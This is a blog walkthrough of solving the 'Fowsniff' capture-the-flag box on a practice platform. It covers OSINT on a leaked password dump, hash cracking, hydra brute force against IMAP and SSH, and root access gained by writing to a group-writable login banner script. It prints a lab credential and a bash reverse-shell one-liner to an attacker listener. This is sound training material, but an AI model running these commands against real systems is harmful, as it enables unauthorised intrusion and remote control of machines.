Fowsniff Offensive-Security Walkthrough
Hello guys hope you are doing great today am going to be doing a walkthough on Fowsniff a box that i found on offensive security platform. I haven’t done OSCP but am planning on taking the exam early next year and therefore i decided to try the free boxes on Offensive security just to get a hang of what to expect. Foxsniff is an easy box that shows the importance of learning OSINT because the initial foothold on the box wasn’t a matter of how well can you enumerate the box but how to spot what stands out. We get a twitter username from the webpage and try it on twitter and find a tweet talking about some credentials were posted in pastebin. The creds were MD5 hashed. We crack those hashes using hashcat and get access to the POP3 server. After we login to POP we get another credential from an email and after doing a SSH brute force with hydra we get a valid SSH credential. User done!!!. For root we enumerate the box with using linpeas and find a group writable file that get executed whenever we log in to the box via SSH add a reverse shell to the group writable file and get root on the box. The box took me about an hour to solve and am trying to solve as many box as possible to reduce the time i take to solve each box because during an OSCP exam the more boxes solve the more score you get. Without much say let’s jump in.
As always we start off with an nmap scan of the box
Looking at the results obtained we have four ports open. 3 of those ports namely SSH, POP3 and IMAP requires credentials for access so we can’t enumerate much there, therefore i started with HTTP which as always has a bigger attack surface and we always like attacking HTTP servers.
Opening the webpage we get a standard web page
I decided to run gobuster on the web page before starting to do manual enumeration
Next i decided to run nikto just in case it comes back with anything useful and left it running in the background
After leaving all automated tools running in the background i decided to enumerate the webpage manually
Looking at the source code by pressing ctrl + u i found nothing useful. I decided to check and see if robots.txt existed and got lucky and found that robots.txt existed
But still looking at robots.txt i found nothing useful. I decided to go back and see if gobuster had found any interesting files or directories
Looking at the gobuster output i saw one interesting file had been identified security.txt
I decided to check the file using the web browser and we see it talks about a hacker called B1gN1nj4! that has already exploited the server
But nothing else useful. Next i decided to cewl the page because some of those words seemed like credentials to me
Next i tried a brute force attack with hydra and it came back empty
It was a dead end. I continued enumerating the box but still it came back empty. I went back to the homepage and decided to read all the information provided and one thing stood out
We are told that the attacker may have released sensitive information on twitter i decided to do some OSINT and went to twitter and hunted for the account
And after searching the username one account showed up
Looking at the tweets we see that the user dumped all the passwords of the users to pastebin and we are given a URL i decided to follow the URL and voila we have our first breakthrough
Looking at the screenshot above we have a list of encrypted credentials i copied them to my local box and sorted the into usernames and passwords
Next i decided to crack the hashes using hashcat using the rockyou wordlist and get the passwords
Looking at the screenshot above we were able to crack all the hashes except one. Sweet
Since we have some possible credentials i again tried a SSH brute force attack
But looking at the result we never got any valid credential. But going back to our enumeration phase we had both IMAP and POP3 which were mailing protocols and required credentials. Hydra also supports brute force for these protocols. I decided to try and brute force IMAP protocol using hydra
And this time i got lucky and found one password of an employee that had not been changed since the breach had happened
Sweet now we have a valid mail account i decided to log into POP3 and see if i could find any mails from Seina’s account
Looking at the screenshot above we have two messages. I decided to take a look at both of them
The first message had a SSH password
I added the password to my passwords list and then looked at the second mail
The second mail had nothing useful apart from a new username that we had obtained. I added the username to the username.txt list
Since we had a new set of credentials i decided to try a SSH brute force for the third time using hydra and this time it came back successful with a valid credential
baksteen:S1ck3nBluff+secureshellI decided to login to SSH using those credentials voila we had a shell on the box
That was a lot of work looking around we have a local.txt (a user flag)
I submitted the flag and it was accepted by offensive security. Sweet i decided to show the flag since Offensive security has a dynamic flag generation system meaning the time you’ll do the box probably the flag will be different same concept is used by HackTheBox platform
But enough of that next i decided to perform privilege escalation on the box. I loaded linpeas to the box and ran it
I allowed linpeas to ran and when it was finished i decided to check the result and one information stood out we have group write access to a file called cube.sh that was present in opt directory
The next interesting thing was there were some encrypted hashes in a databases
These hashes seemed to be md5crypt hashes
But i decided to take a look at the cube.sh file first
Looking at the screenshot above we can see that it’s just the banner seen every time we log in to the box and since i had write access to the file and it being a bash script i could just add a bash command into the file and when it gets executed it could print the result of the executed command
I wrote whoami and saved the file and again i tried logging into the box using SSH again and looking at the screenshot below we have code execution and we are root on the box
Next i added a bash reverse shell to the file using the folowing syntax below
bash -i >& /dev/tcp/192.168.49.185/9001 0>&1I saved the script and set up a netcat listener
Then tried logging into the box using SSH again and as you see below we had a root shell on the box
Next i decided to look around for the the root flag and it was in the root folder i submitted it again to offensive security
And the box is pretty much done guys we have root on the box. It was rated as an easy box and i think i did spend much time during the initial foothold. About an hour to complete the box was a lot of time for such a box. Am not sure if it’s an OSCP like box but it was fun none the less. Hope you guys enjoyed the walkthrough if so you can clap for me down below and don’t forget to follow me so that you don’t mi any upcoming articles.
Looking at the walkthrough i decided not only to show the correct path of solving the box but to also show the rabbit hole that i fell into and the reason why i did so was to show you get when you need to stop enumerating something and find a different vectors. The privilege escalation is similar to when you have write access to motd.
Till next time it’s goodbye from me.
For more reading materials you can take a look at the link below